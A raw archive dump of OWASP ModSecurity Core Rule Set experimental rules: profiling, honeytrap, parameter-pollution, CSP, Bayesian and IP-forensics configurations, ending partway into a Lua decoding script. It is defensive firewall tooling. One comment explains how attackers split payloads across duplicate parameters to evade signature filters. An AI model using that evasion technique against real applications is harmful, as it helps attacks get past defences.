Phase:5 - Profiling Analysis # # If there is a match, the rules will skip down until it hits the SecMarker END_PROFILER_RULES # at the end of this file. # # If you want to use these rules you must: # 1. Uncomment the rules # 2. Create the modsecurity_40_appsensor_ignore.data file in the same directory # #SecRule REQUEST_FILENAME "@pmFromFile modsecurity_40_appsensor_ignore.data" "phase:2,id:'981083',t:none,nolog,pass,skipAfter:END_PROFILER_RULES" #SecRule REQUEST_FILENAME "@pmFromFile modsecurity_40_appsensor_ignore.data" "phase:5,id:'981084',t:none,nolog,pass,skipAfter:END_PROFILER_RULES" ��������������������������������������������������������������������modsecurity_crs_40_appsensor_detection_point_2.1_request_exception.conf�����������������������������0000664�0000000�0000000�00000020773�12164572564�0042524�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/experimental_rules������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.0 # Copyright (C) 2006-2011 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # -=[ OWASP AppSensor Detection Points - Request Exceptions (RE) Category ]=- # # - https://www.owasp.org/index.php/AppSensor_DetectionPoints#RequestException # # Instead of creating rule set based on analyzing saved audit log data, we can # instead profile live transactions in phase:5 post processing and save data in # Resource-based persistent collections. Once we have seen enough traffic (as # defined below) we can then move into Enforcement Mode. # SecMarker BEGIN_RE_PROFILE_ENFORCEMENT # # Should we enforce the learned profile for this transaction? # # If the resource.enforce_profile parameter is not set, then we skip enforcement. # SecRule &RESOURCE:ENFORCE_RE_PROFILE "@eq 0" "phase:2,id:'981085',t:none,nolog,pass,skipAfter:END_RE_PROFILE_ENFORCEMENT" SecRule &RESOURCE:ENFORCE_RE_PROFILE "@eq 1" "phase:2,id:'981086',t:none,nolog,pass,exec:/opt/modsecurity/etc/crs/lua/appsensor_request_exception_enforce.lua" # # -=[ RE2: Attempt to Invoke Unsupported HTTP Method ]=- # # - https://www.owasp.org/index.php/AppSensor_DetectionPoints#RE2 # SecRule REQUEST_METHOD "!@within HEAD GET POST PUT DELETE TRACE OPTIONS CONNECT" "phase:2,id:'981087',t:none,block,msg:'Attempt to Invoke Unsupported HTTP Method.',logdata:'%{request_method}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.profiler_score=+%{tx.error_anomaly_score},tag:'POLICY/METHOD_NOT_ALLOWED',tag:'OWASP_AppSensor/RE2',tag:'https://www.owasp.org/index.php/AppSensor_DetectionPoints#RE2'" # # -=[ RE1: Unexpected HTTP Command ]=- # # - https://www.owasp.org/index.php/AppSensor_DetectionPoints#RE1 # SecRule TX:REQUEST_METHOD_VIOLATION "@eq 1" "phase:2,id:'981088',t:none,block,capture,msg:'Invalid Request Method for Resource.',logdata:'Current Request Method: %{request_method} and Allowed Request Method(s): %{resource.enforce_request_methods}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.profiler_score=+%{tx.error_anomaly_score},tag:'POLICY/METHOD_NOT_ALLOWED',tag:'OWASP_AppSensor/RE1',tag:'https://www.owasp.org/index.php/AppSensor_DetectionPoints#RE1'" # # -=[ RE5: Additional/Duplicated Data in Request ]=- # # - https://www.owasp.org/index.php/AppSensor_DetectionPoints#RE5 # SecRule TX:MIN_NUM_ARGS_VIOLATION "@eq 1" "phase:2,id:'981089',t:none,block,msg:'Invalid Number of Parameters - Missing Parameter(s)',logdata:'Min Number of ARGS: %{resource.minnumofargs} and Number of ARGS Submitted: %{tx.num_of_args}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.profiler_score=+%{tx.error_anomaly_score},tag:'POLICY/PARAMETER_VIOLATION',tag:'OWASP_AppSensor/RE5',tag:'https://www.owasp.org/index.php/AppSensor_DetectionPoints#RE5'" SecRule TX:MAX_NUM_ARGS_VIOLATION "@eq 1" "phase:2,id:'981090',t:none,block,msg:'Invalid Number of Parameters - Additional Parameter(s)',logdata:'Max Number of ARGS: %{resource.maxnumofargs} and Number of ARGS Submitted: %{tx.num_of_args}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.profiler_score=+%{tx.error_anomaly_score},tag:'POLICY/PARAMETER_VIOLATION',tag:'OWASP_AppSensor/RE5',tag:'https://www.owasp.org/index.php/AppSensor_DetectionPoints#RE5'" SecRule TX:ARGS_NAMES_VIOLATION ".*" "phase:2,id:'981091',t:none,block,msg:'Invalid Parameter Name(s).',logdata:'%{matched_var}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.profiler_score=+%{tx.error_anomaly_score},tag:'POLICY/PARAMETER_VIOLATION',tag:'OWASP_AppSensor/RE5',tag:'https://www.owasp.org/index.php/AppSensor_DetectionPoints#RE5'" # # -=[ RE7: Unexpected Quantity of Characters in Parameter ]=- # # - https://www.owasp.org/index.php/AppSensor_DetectionPoints#RE7 # SecMarker BEGIN_ENFORCE_LENGTH SecRule TX:/^ARGS.*_MIN_LENGTH_VIOLATION/ ".*" "phase:2,id:'981092',t:none,block,msg:'Invalid Parameter Length - Value Is Below Normal Range',logdata:'Normal Minimum Length for Parameter (%{tx.minarglengthname}): %{tx.minarglength} and Current Length: %{matched_var}',tag:'POLICY/PARAMETER_VIOLATION',tag:'OWASP_AppSensor/RE7',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.profiler_score=+%{tx.error_anomaly_score}" SecRule TX:/^ARGS.*_MAX_LENGTH_VIOLATION/ ".*" "phase:2,id:'981093',t:none,block,msg:'Invalid Parameter Length - Value Is Above Normal Range',logdata:'Normal Maximum Length for Parameter (%{tx.maxarglengthname}): %{tx.maxarglength} and Current Length: %{matched_var}',tag:'POLICY/PARAMETER_VIOLATION',tag:'OWASP_AppSensor/RE7',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.profiler_score=+%{tx.error_anomaly_score}" SecMarker END_ENFORCE_LENGTH # # -=[ RE8: Unexpected Type of Characters in Parameter ]=- # # - https://www.owasp.org/index.php/AppSensor_DetectionPoints#RE8 # # # Enforce Digits Character Class # SecRule TX:/^ARGS.*_digits_violation/ ".*" "phase:2,id:'981094',t:none,block,msg:'Invalid Character(s) in Payload - Expecting Digits.',logdata:'Parameter (%{tx.digits_violation_name}): %{matched_var}',tag:'OWASP_AppSensor/RE8',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.profiler_score=+%{tx.error_anomaly_score}" # # Enforce Alpha Character Class # SecRule TX:/^ARGS.*_alpha_violation/ ".*" "phase:2,id:'981095',t:none,block,msg:'Invalid Character(s) in Payload - Expecting Letters.',logdata:'Parameter (%{tx.alpha_violation_name}): %{matched_var}',tag:'OWASP_AppSensor/RE8',setvar:tx.profiler_score=+%{tx.error_anomaly_score}" # # Enforce AlphaNumeric Character Class # SecRule TX:/^ARGS.*_alphanumeric_violation/ ".*" "phase:2,id:'981096',t:none,block,msg:'Invalid Character(s) in Payload - Expecting AlphNumeric.',logdata:'Parameter (%{tx.alphanumeric_violation_name}): %{matched_var}',tag:'OWASP_AppSensor/RE8',setvar:tx.profiler_score=+%{tx.error_anomaly_score}" # # Enforce Email Character Class # SecRule TX:/^ARGS.*_email_violation/ ".*" "phase:2,id:'981097',t:none,block,msg:'Invalid Character(s) in Payload - Expecting Email.',logdata:'Parameter (%{tx.email_violation_name}): %{matched_var}',tag:'OWASP_AppSensor/RE8',setvar:tx.profiler_score=+%{tx.error_anomaly_score}" # # Enforce Path Character Class # SecRule TX:/^ARGS.*_path_violation/ ".*" "phase:2,id:'981103',t:none,block,msg:'Invalid Character(s) in Payload - Expecting Path.',logdata:'Parameter (%{tx.path_violation_name}): %{matched_var}',tag:'OWASP_AppSensor/RE8',setvar:tx.profiler_score=+%{tx.error_anomaly_score}" # # Enforce Url Character Class # SecRule TX:/^ARGS.*_url_violation/ ".*" "phase:2,id:'981104',t:none,block,msg:'Invalid Character(s) in Payload - Expecting Url.',logdata:'Parameter (%{tx.url_violation_name}): %{matched_var}',tag:'OWASP_AppSensor/RE8',setvar:tx.profiler_score=+%{tx.error_anomaly_score}" # # Enforce Flag Character Class # SecRule TX:/^ARGS.*_flag_violation/ ".*" "phase:2,id:'981110',t:none,block,msg:'Invalid Character(s) in Payload - Expecting Flag.',logdata:'Parameter (%{tx.flag_violation_name}): %{matched_var}',tag:'OWASP_AppSensor/RE8',setvar:tx.profiler_score=+%{tx.error_anomaly_score}" # # Enforce SafeText Character Class # SecRule TX:/^ARGS.*_safetext_violation/ ".*" "phase:2,id:'981105',t:none,block,msg:'Invalid Character(s) in Payload - Expecting SafeText.',logdata:'Parameter (%{tx.safetext_violation_name}): %{matched_var}',tag:'OWASP_AppSensor/RE8',setvar:tx.profiler_score=+%{tx.error_anomaly_score}" SecMarker END_RE_PROFILE_ENFORCEMENT # # --[ Begin Profiling Phase ]-- # SecMarker BEGIN_RE_PROFILE_ANALYSIS SecAction "phase:5,id:'981098',t:none,nolog,pass,ctl:ruleEngine=DetectionOnly" SecRule RESPONSE_STATUS "^404$" "phase:5,id:'981099',t:none,nolog,pass,setvar:!resource.KEY,skipAfter:END_RE_PROFILE_ANALYSIS" SecRule RESPONSE_STATUS "^(5|4)" "phase:5,id:'981100',t:none,nolog,pass,skipAfter:END_RE_PROFILE_ANALYSIS" SecRule TX:ANOMALY_SCORE "!@eq 0" "phase:5,id:'981101',t:none,nolog,pass,skipAfter:END_RE_PROFILE_ANALYSIS" SecRule &RESOURCE:ENFORCE_RE_PROFILE "@eq 1" "phase:2,id:'981102',t:none,nolog,pass,skipAfter:END_RE_PROFILE_ANALYSIS" SecRuleScript /opt/modsecurity/etc/crs/lua/appsensor_request_exception_profile.lua "phase:5,nolog,pass" SecMarker END_RE_PROFILE_ANALYSIS �����modsecurity_crs_40_appsensor_detection_point_2.9_honeytrap.conf�������������������������������������0000664�0000000�0000000�00000002505�12164572564�0040770�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/experimental_rules������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # -=[ HT1: Alteration to Honey Trap Data ]=- # # - https://www.owasp.org/index.php/AppSensor_DetectionPoints#HT1 # SecRule ARGS:DEBUG "!@streq false" "phase:2,id:'981131',t:none,block,msg:'Tampering of Hidden Parameter Honeytrap Data.',logdata:'%{matched_var}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.profiler_score=+%{tx.error_anomaly_score},tag:'HONEYTRAP/HIDDEN_DATA_TAMPERING',tag:'OWASP_AppSensor/HT1',tag:'https://www.owasp.org/index.php/AppSensor_DetectionPoints#HT1'" # # Add a fake "debug" hidden parameter to forms. # # Here are some examples of parameter names/values that could be used: # # - debug=false # - debug=0 # - role=user # - role=1 # - admin=false # - admin=0 # # Make sure that your settings here match the detection rules above. # SecRule STREAM_OUTPUT_BODY "@rsub s/<\/form>/<input type=\"hidden\" name=\"debug\" value=\"false\"><\/form>/" "phase:4,id:'981132',t:none,nolog,pass" �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity_crs_40_appsensor_detection_point_3.0_end.conf�������������������������������������������0000664�0000000�0000000�00000000643�12164572564�0037516�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/experimental_rules������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- SecMarker END_PROFILER_RULES ���������������������������������������������������������������������������������������������modsecurity_crs_40_http_parameter_pollution.conf����������������������������������������������������0000664�0000000�0000000�00000004200�12164572564�0036144�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/experimental_rules������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # The rules in this file are considered experimental/beta rules. They attempt to address # some advanced attacks, use some new ModSecurity features or new rules language techniques. # # # HTTP Parameter Pollution (HPP) # # One HPP attack vector is to try evade signature filters by distributing the attack payload # across multiple parameters with the same name. This works as many security devices only # apply signatures to individual parameter payloads, however the back-end web application # may (in the case of ASP.NET) consolidate all of the payloads into one thus making the # attack payload active. # # -=[ Rules Logic }=- # The ruleset below is not looking for attacks directly, but rather is a crude normalization # function that mimics ASP.NET with regards to joining the payloads of parameters with the # same name. These rules will create a new TX:HPP_DATA variable that will hold this data. # If you have enabled PARANOID_MODE, then this variable data will also be searched against # attack filters. # # -=[ References ]=- # http://tacticalwebappsec.blogspot.com/2009/05/http-parameter-pollution.html # SecRule ARGS "^" "chain,phase:2,t:none,nolog,pass,capture,id:'900032',rev:'2.2.8',setvar:tx.%{matched_var_name}=+1" SecRule TX:/^ARGS:/ "@gt 1" "chain,t:none" SecRule MATCHED_VARS_NAMES "TX:(ARGS:.*)" "chain,capture,t:none,setvar:tx.hpp_names=%{tx.1}" SecRule ARGS ".*" "chain,t:none,capture,setvar:tx.arg_counter=+1,setvar:'tx.hppnamedata_%{tx.arg_counter}=%{matched_var_name}=%{tx.0}'" SecRule TX:/HPPNAMEDATA_/ "@contains %{tx.hpp_names}" "chain,setvar:tx.hpp_counter=+1,setvar:tx.hpp_counter_%{tx.hpp_counter}=%{matched_var}" SecRule TX:/HPP_COUNTER_/ "ARGS:(.*)?=(.*)" "capture,setvar:'tx.hpp_data=%{tx.hpp_data},%{tx.2}'" ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/experimental_rules/modsecurity_crs_42_csp_enforcement.conf�0000664�0000000�0000000�00000004260�12164572564�0034261�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # -=[ Content Security Policy (CSP) Settings ]=- # # The purpose of these settings is to send CSP response headers to # Mozilla FireFox users so that you can enforce how dynamic content # is used. CSP usage helps to prevent XSS attacks against your users. # # Reference Link: # # https://developer.mozilla.org/en/Security/CSP # # # If this is a CSP Violation Report Request, we need to enable request # body population of the REQUEST_BODY variable. This is not done by # default since the request body content-type is JSON. # SecRule REQUEST_FILENAME "@streq %{tx.csp_report_uri}" "phase:1,id:'981142',t:none,nolog,pass,ctl:forceRequestBodyVariable=On" # # Check the REQUEST_BODY for CSP Violation Report data and generate an Alert # SecRule REQUEST_BODY "({\"csp-report\":.*blocked-uri\":\"(.*?)\".*violated-directive\":\"(.*)\")" "phase:2,id:'960001',capture,t:none,log,pass,msg:'Content Security Policy (CSP) Violation',logdata:'blocked-uri:%{tx.2} violated-directive:%{tx.3}',tag:'OWASP_AppSensor/RP3',tag:'https://www.owasp.org/index.php/AppSensor_DetectionPoints#RP3'" # # Check the User-Agent string for FireFox users and then set an ENV var # to tell Apache which CSP header policy to use. # SecRule REQUEST_HEADERS:User-Agent "(?i:mozilla.*firefox)" "phase:3,id:'960002',t:none,nolog,pass,chain" SecRule TX:CSP_REPORT_ONLY "@eq 1" "setenv:firefox_client-csp_report_only=1" SecRule REQUEST_HEADERS:User-Agent "(?i:mozilla.*firefox)" "phase:3,id:'960003',t:none,nolog,pass,chain" SecRule TX:CSP_REPORT_ONLY "@eq 0" "setenv:firefox_client-csp_enforce=1" # # Set the appropriate CSP Policy Header for FireFox clients # Header set X-Content-Security-Policy-Report-Only "%{csp_policy}e" env=firefox_client-csp_report_only Header set X-Content-Security-Policy "%{csp_policy}e" env=firefox_client-csp_enforce ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity_crs_46_scanner_integration.conf���������������������������������������������������������0000664�0000000�0000000�00000002217�12164572564�0035070�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/experimental_rules������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # -=[ You must be using the Resource Profiling Rules to track this data ]=- # # modsecurity_crs_40_appsensor_detection_point_2.0_setup.conf # modsecurity_crs_40_appsensor_detection_point_3.0_end.conf # SecRule TX:/XSS-ARGS:/ ".*" "id:'999003',chain,phase:2,t:none,msg:'XSS Attack Against Known Vulnerable Parameter.',logdata:'%{matched_var}'" SecRule MATCHED_VARS_NAMES "-ARGS:(.*)$" "chain,capture" SecRule TX:1 "@within %{resource.xss_vulnerable_params}" SecRule TX:/SQL_INJECTION-ARGS:/ ".*" "id:'999004',chain,phase:2,t:none,msg:'SQLi Attack Against Known Vulnerable Parameter.',logdata:'%{matched_var}'" SecRule MATCHED_VARS_NAMES "-ARGS:(.*)$" "chain,capture" SecRule TX:1 "@within %{resource.sqli_vulnerable_params}" ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/experimental_rules/modsecurity_crs_48_bayes_analysis.conf��0000664�0000000�0000000�00000002167�12164572564�0034127�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # You must edit the local path to the lua scripts # SecRule TX:'/^\\\d.*WEB_ATTACK/' ".*" "phase:2,id:'900033',t:none,log,pass,logdata:'%{tx.bayes_msg}',exec:lua/bayes_train_spam.lua" SecRuleScript lua/bayes_check_spam.lua "phase:2,id:'900034',t:none,block,msg:'Bayesian Analysis Detects Probable Attack.',logdata:'Score: %{tx.bayes_score}',severity:'2',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-WEB_ATTACK/BAYESIAN-%{matched_var_name}=%{tx.0}" SecRule &TX:ANOMALY_SCORE "@eq 0" "phase:5,id:'900035',t:none,log,pass,logdata:'%{tx.bayes_msg}',exec:lua/bayes_train_ham.lua" ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity_crs_55_response_profiling.conf����������������������������������������������������������0000664�0000000�0000000�00000006022�12164572564�0034741�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/experimental_rules������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- SecRuleScript profile_page_scripts.lua "phase:4,id:'981187',t:none,nolog,pass" SecRule &RESOURCE:'/(niframes|nscripts|nlinks|nimages)/' "@eq 0" "skipAfter:END_PAGE_PROFILE,phase:4,id:'981188',t:none,nolog,pass,setvar:resource.niframes=%{tx.niframes},setvar:resource.nscripts=%{tx.nscripts},setvar:resource.nlinks=%{tx.nlinks},setvar:resource.nimages=%{tx.nimages}" SecRule TX:NIFRAMES "@eq %{resource.niframes}" "phase:4,id:'981189',t:none,nolog,pass,setvar:resource.profile_confidence_counter=+1" SecRule TX:NSCRIPTS "@eq %{resource.nscripts}" "phase:4,id:'981190',t:none,nolog,pass,setvar:resource.profile_confidence_counter=+1" SecRule TX:NLINKS "@eq %{resource.nlinks}" "phase:4,id:'981191',t:none,nolog,pass,setvar:resource.profile_confidence_counter=+1" SecRule TX:NIMAGES "@eq %{resource.nimages}" "phase:4,id:'981192',t:none,nolog,pass,setvar:resource.profile_confidence_counter=+1" SecRule RESOURCE:PROFILE_CONFIDENCE_COUNTER "@lt 40" "phase:4,id:'981193',t:none,nolog,pass,skipAfter:END_PAGE_PROFILE" SecRule TX:NIFRAMES "!@eq %{resource.niframes}" "phase:4,id:'981194',t:none,block,msg:'Number of IFrames in Page Have Changed.',logdata:'Previous #: %{resource.niframes} and Current #: %{tx.niframes}',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+{tx.error_anomaly_score},setvar:tx.%{rule.id}-PROFILE/ANOMALY-%{matched_var_name}=%{tx.0}" SecRule TX:NSCRIPTS "!@eq %{resource.nscripts}" "phase:4,id:'981195',t:none,block,msg:'Number of Scripts in Page Have Changed.',logdata:'Previous #: %{resource.nscripts} and Current #: %{tx.nscripts}',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+{tx.error_anomaly_score},setvar:tx.%{rule.id}-PROFILE/ANOMALY-%{matched_var_name}=%{tx.0}" SecRule TX:NLINKS "!@eq %{resource.nlinks}" "phase:4,id:'981196',t:none,block,msg:'Number of Links in Page Have Changed.',logdata:'Previous #: %{resource.nlinks} and Current #: %{tx.nlinks}',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+{tx.error_anomaly_score},setvar:tx.%{rule.id}-PROFILE/ANOMALY-%{matched_var_name}=%{tx.0}" SecRule TX:NIMAGES "!@eq %{resource.nimages}" "phase:4,id:'981197',t:none,block,msg:'Number of Images in Page Have Changed.',logdata:'Previous #: %{resource.nimages} and Current #: %{tx.nimages}',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.outbound_anomaly_score=+%{tx.error_anomaly_score},setvar:tx.anomaly_score=+{tx.error_anomaly_score},setvar:tx.%{rule.id}-PROFILE/ANOMALY-%{matched_var_name}=%{tx.0}" SecMarker END_PAGE_PROFILE ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/experimental_rules/modsecurity_crs_56_pvi_checks.conf������0000664�0000000�0000000�00000001307�12164572564�0033231�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- SecRule &RESOURCE:OSVDB_CHECK "@eq 0" "chain,phase:5,id:'981198',t:none,nolog,pass" SecRule RESPONSE_STATUS "@streq 200" "exec:/usr/local/apache/conf/modsec_current/base_rules/osvdb.lua" SecRule TX:OSVDB_MSG "!^$" "phase:5,id:'981199',t:none,log,pass,msg:'Passive Vulnerabilty Check with OSVDB - %{matched_var}'" �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/experimental_rules/modsecurity_crs_61_ip_forensics.conf����0000664�0000000�0000000�00000003730�12164572564�0033574�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # Gather IP/Host Data for Audit Logging # # - http://blog.spiderlabs.com/2010/11/detecting-malice-with-modsecurity-ip-forensics.html # # # Execute the IP Lookup/Whois Check when anomaly scores are not 0 # # You must update the local path for the exec action to point to the lua script. # SecRule TX:ANOMALY_SCORE "@gt 0" "phase:5,t:none,pass,nolog,id:'900036',exec:/usr/local/apache/conf/crs/lua/gather_ip_data.lua" SecRule TX:HOSTNAME ".*" "phase:5,t:none,pass,log,id:'900037',msg:'Client Nslookup/WHOIS Abuse Info.',logdata:'Hostname: %{tx.hostname} and WHOIS Abuse Contact: %{tx.abuse_contact}',setvar:'ip.hostname=Hostname: %{tx.hostname} and WHOIS Abuse Contact: %{tx.abuse_contact}',expirevar:ip.hostname=86400,skip:1" SecRule TX:ANOMALY_SCORE "@gt 0" "phase:5,t:none,pass,log,id:'900038',msg:'Client Nslookup/WHOIS Abust Info.',logdata:'%{ip.hostname}'" # # Download the GeoIP DB from MaxMind # # GeoLite City - http://www.maxmind.com/app/geolitecity # GeoLite Country - http://www.maxmind.com/app/geoip_country # # Define the proper path to the GeoIP DB SecGeoLookupDb /usr/local/apache/conf/modsec_current/base_rules/GeoLiteCity.dat # # Check the Transactional Anomaly Score - if it is not 0 then record the GeoIP data # for the client in the audit log. # SecRule TX:ANOMALY_SCORE "@gt 0" "chain,phase:5,pass,t:none,log,id:'900039',severity:'5',msg:'Logging GeoIP Data due to anomaly score.',logdata:'Country Code=%{geo.country_code}, Country Code3=%{geo.country_code3}, Country Name=%{geo.country_name}, Country Continent=%{geo.country_continent}, City=%{geo.city}'" SecRule REMOTE_ADDR "@geoLookup" ����������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/lua/�������������������������������������������������������0000775�0000000�0000000�00000000000�12164572564�0021305�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/lua/advanced_filter_converter.lua��������������������������0000775�0000000�0000000�00000063206�12164572564�0027223�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/opt/local/bin/lua local rex = require "rex_pcre" local B = require "bit" function main() function dec2hex(nValue) if type(nValue) == "string" then nValue = String.ToNumber(nValue); end nHexVal = string.format("%X", nValue); sHexVal = nHexVal..""; return sHexVal; end function hex2dec (arg) local dec = {} for str in string.gfind(arg, "%w%w") do local str = '0X'..str table.insert(dec, tonumber(str)) end return unpack(dec) end function explode ( seperator, str ) local pos, arr = 0, {} for st, sp in function() return string.find( str, seperator, pos, true ) end do table.insert( arr, string.sub( str, pos, st-1 ) ); pos = sp + 1; end table.insert( arr, string.sub( str, pos ) ); return arr end function oct2dec(octstr) local i, len, num; num = 0; i = 0; octstr = string.reverse(octstr); len = string.len(octstr); if (len > 11) then return 1; end for str in string.gfind(octstr, "%w") do number = tonumber(str); if((number < 0) or (number > 7)) then num = 0; return 0; end i = tonumber(i); num_shr = B.lshift(number ,(i*3)); num = B.bor(num,num_shr); i = i + 1; end return num; end function str_split_unique(data) a = {} b = {} -- use table to eliminate duplicates for i=1,string.len(data) do v = string.sub(data,i,i) a[v] = v end -- insert into ordered array and sort for k,v in pairs(a) do table.insert(b,k) end table.sort(b) return b end function str_split(data) a = {} for i=1,string.len(data) do a[i] = string.sub(data,i,i) end return a end -- character table string local b='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/' -- base64 decoding function base64decode(data) data = string.gsub(data, '[^'..b..'=]', '') return (data:gsub('.', function(x) if (x == '=') then return '' end local r,f='',(b:find(x)-1) for i=6,1,-1 do r=r..(f%2^i-f%2^(i-1)>0 and '1' or '0') end return r; end):gsub('%d%d%d?%d?%d?%d?%d?%d?', function(x) if (#x ~= 8) then return '' end local c=0 for i=1,8 do c=c+(x:sub(i,i)=='1' and 2^(8-i) or 0) end return string.char(c) end)) end function urldecode(s) return (string.gsub (string.gsub (s, "+", " "), "%%(%x%x)", function (str) return string.char (tonumber 